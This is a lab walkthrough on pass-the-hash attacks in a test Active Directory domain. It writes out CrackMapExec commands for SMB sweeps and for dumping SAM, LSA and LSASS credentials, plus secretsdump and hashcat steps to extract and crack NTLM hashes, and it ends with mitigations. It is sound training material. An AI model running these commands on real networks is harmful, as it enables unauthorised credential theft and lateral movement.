Pass Attacks

Introduction

In cybersecurity, pass attacks exploit the authentication mechanisms of networked systems by using hash credentials rather than plaintext passwords. These attacks allow lateral movement within a network, often bypassing conventional security restrictions.

Methodology

Step 1: Initial Setup with CrackMapExec

CrackMapExec is a powerful post-exploitation tool for enumerating and exploiting Active Directory (AD) environments. First, we ensure that CrackMapExec is functioning correctly by viewing the available options:

crackmapexec --help
CrackMapExec

Step 2: Running SMB Commands

To explore SMB (Server Message Block) shares and services, we can start by listing the help options specific to SMB:

crackmapexec smb --help
CrackMapExec — SMB

We then connect to the network, specifying the target subnet and credentials. In this phase, we successfully obtain the credentials of the Punisher and Spiderman machines, allowing access to additional resources and revealing valuable information about other accessible systems on the network.

sudo crackmapexec smb 192.168.92.0/24 -u fcastle -d MARVEL.local -p Password1

The command uses CrackMapExec to scan the 192.168.92.0/24 subnet for SMB services. It attempts to authenticate with the username fcastle and password Password1 on the domain MARVEL.local. If successful, it enumerates SMB shares and gathers information about the devices in the network. This is typically used for network reconnaissance and SMB vulnerability testing during penetration testing.

Step 3: Testing Authentication with Hashes

We use the -H option to leverage hash-based authentication, which specifies NTLM hash values instead of plain-text passwords. This technique is crucial in pass-the-hash attacks, where plaintext passwords are unnecessary.

sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth
CrackMapExec — Local-auth

Step 4: Enumerating SAM Accounts and Shares

SAM (Security Account Manager) databases and shared folders are common targets in network environments. Enumerating these allows us to view stored credentials and shared resources, providing insight into the network’s structure

SAM Enumeration

sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth –sam
CrackMapExec — local-auth — Sam

Shared Folders Enumeration

sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth –shares
CrackMapExec — local-auth — Shares

Step 5: Local Security Authority (LSA) Enumeration

The Local Security Authority (LSA) maintains various security policies and account information. Accessing it provides further credential-based access.

sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth –lsa
CrackMapExec — local-auth — lsa
CrackMapExec — local-auth — lsa

Step 6: Listing All Available SMB Shares

We use the -L option to enumerate SMB shares across the network. This step provides visibility into the shared resources accessible to the specified user, offering insight into sensitive data or high-privilege directories.

crackmapexec smb -L
Listing all available SMB share
Listing all available SMB share

Step 7: Running LSASSY Module

Lsassy is an extraction tool that works alongside CrackMapExec to dump credentials from the Local Security Authority Subsystem Service (LSASS).

sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth -M lsassy
CrackMapExec — local-auth -lsassy

Step 8: Database Enumeration and Switch to CMEDB

We switch to CMEDB, CrackMapExec’s integrated database module to manage and review data on extracted hosts. This module allows us to view host details and extracted data.

  • Enter CMEDB

cmedb

Check Hosts and Shares

  • hosts

  • Shares

Dumping and Cracking Hashes with Secrets Dump

SecretsDump is utilized to retrieve hashed credentials from systems, providing direct access to SAM hashes.

  1. Dumping Hashes with Credentials

secretsdump.py MARVEL.local/fcastle:'Password1'@192.168.92.128
SecretsDump — fcastle

2. Using Alternate Credentials

secretsdump.py MARVEL.local/pparker:'Password1'@192.168.92.137
SecretsDump — pparker

3. Dumping Hashes with a Provided Hash

secretsdump.py administrator@192.168.92.128 -hashes <hash>

Cracking Retrieved Hashes with Hashcat

Once hashes are extracted, we proceed with cracking them to reveal passwords. After creating a file for the hashes:

· Create a Hash File

mousepad ntlm.txt

Then, paste the copied hash into this file.

· Verify NTLM Hash Format

hashcat --help | grep NTLM

· Crack Hashes with Hashcat

hashcat -m 1000 ntlm.txt rockyou.txt
  • hashcat: This is the tool used for high-performance password cracking. Hashcat supports various hashing algorithms and allows us to perform dictionary, brute-force, and hybrid attacks.

  • -m 1000: The -m option specifies the hashing algorithm. In this case, 1000 is the mode identifier for NTLM hashes. NTLM is a hash format used mainly by Windows operating systems to store password hashes. The mode 1000 tells Hashcat that the hashes in the file ntlm.txt are NTLM hashes and to use the appropriate algorithm.

  • ntlm.txt: This is the input file containing the NTLM hashes to be cracked.

  • rockyou.txt: This is the wordlist or dictionary file used by Hashcat to attempt cracking the hashes.

Hash Cracked

Mitigations

Pass the Hash / Pass the Password

While it is challenging to fully prevent pass attacks, several mitigations can significantly raise the difficulty for attackers:

  1. Limit Account Re-use

o Unique Passwords for Each Local Administrator Account: Avoid re-using the same password across different local administrator accounts.

o Disable Guest and Built-In Administrator Accounts: Disabling these accounts reduces attack entry points, as they are often default targets.

o Apply the Principle of Least Privilege: Restrict local administrator rights to only essential personnel and systems to minimize the risk and impact of an account being compromised.

2. Utilize Strong Passwords

o Enforce Long and Complex Passwords: Require passwords longer than 14 characters with a mix of upper and lower case letters, numbers, and symbols. Stronger passwords increase the difficulty of successful brute force and pass-the-hash attacks.

3. Multi-Factor Authentication (MFA)

o Adding MFA, especially for privileged accounts, greatly enhances security by requiring additional verification steps beyond just the password or hash.

4. Network Segmentation and Isolation

o Separate High-Risk and Critical Systems: Segment the network so that high-value assets, such as domain controllers and critical servers, are isolated from other network zones. This restricts lateral movement if one account or machine is compromised.

Last updated